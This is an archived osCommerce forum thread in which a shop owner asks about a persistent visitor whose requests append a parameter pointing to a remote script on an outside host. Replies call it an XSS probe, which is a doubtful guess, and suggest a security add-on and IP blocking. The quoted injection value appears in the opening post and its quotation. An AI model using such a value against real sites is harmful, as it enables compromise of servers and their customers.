Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Covert activity as seen in "who's online" - Please help


ITISI

Recommended Posts

Posted

As seen through Who's Online, I have an ongoing problem with a visitor/session that remains in my site for many hours. I've seen 16+ hours at a time. This has been going on for weeks at a minimum. My host is at a loss and as far as they are concerned they do not see any problem from their end.

 

I did see a post discussing something similar redirecting traffic else where.

 

Some facts...

1. Their IP address changes frequently but their time online continues to increment.

2. Their Last URL changes along with their IP address.

3. The displayed IP addresses are real, although I'm concerned they are masking their real IP, and just cycling through a list of valid IP's, in which caset I probably don't want to block.

4. I've restarted my site via my host control panel many times but they come right back. In fact, the amount of time on the site for their session continues to increment as if the restart did not knock them off the site.

5. The Last URL rotates between many of my web pages, but often includes additional appended text that begins with "cid=" then a url. For example cid=http://cherrygirl.h18.ru/images/cs.txt?. I've visited these URLS which only contain some sort of a script.

 

 

Any insight would be great.

 

Also, I'm trying to find a reliable osCommerce technical resource so if you know of a professional that can assist me, it would be greatly appreciated.

 

Thanks much

Posted
As seen through Who's Online, I have an ongoing problem with a visitor/session that remains in my site for many hours. I've seen 16+ hours at a time. This has been going on for weeks at a minimum. My host is at a loss and as far as they are concerned they do not see any problem from their end.

 

I did see a post discussing something similar redirecting traffic else where.

 

Some facts...

1. Their IP address changes frequently but their time online continues to increment.

2. Their Last URL changes along with their IP address.

3. The displayed IP addresses are real, although I'm concerned they are masking their real IP, and just cycling through a list of valid IP's, in which caset I probably don't want to block.

4. I've restarted my site via my host control panel many times but they come right back. In fact, the amount of time on the site for their session continues to increment as if the restart did not knock them off the site.

5. The Last URL rotates between many of my web pages, but often includes additional appended text that begins with "cid=" then a url. For example cid=http://cherrygirl.h18.ru/images/cs.txt?. I've visited these URLS which only contain some sort of a script.

Any insight would be great.

 

Also, I'm trying to find a reliable osCommerce technical resource so if you know of a professional that can assist me, it would be greatly appreciated.

 

Thanks much

 

The appended url looks like they are looking for an XSS (cross site scripting) vulnerability. Is your site fully up to date with all recommended security fixes?

 

You may get some peace of mind by installing the security pro contribution which guards your querystring against attacks like this.

Posted

you might try a contribution that allows you to block the ip address. there is http://addons.oscommerce.com/info/2532 and there may be others. he's obviously not a customer, so banning his ip wouldn't hurt and it'll keep him from being able to figure out how to hack your site and/or steal your bandwidth.

Posted
you might try a contribution that allows you to block the ip address. there is http://addons.oscommerce.com/info/2532 and there may be others. he's obviously not a customer, so banning his ip wouldn't hurt and it'll keep him from being able to figure out how to hack your site and/or steal your bandwidth.

 

 

Thanks Dave. Unfortunately it appears he rotates valid URL's instead of displaying his own.

Posted
The appended url looks like they are looking for an XSS (cross site scripting) vulnerability. Is your site fully up to date with all recommended security fixes?

 

You may get some peace of mind by installing the security pro contribution which guards your querystring against attacks like this.

 

Thanks for the suggestions. I have no idea if I'm up to date and I'm looking for a an osCommerce person to assist me. Please let me know if you'd like to take care of this for me. (paid of course) I can be reached at [email protected]

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...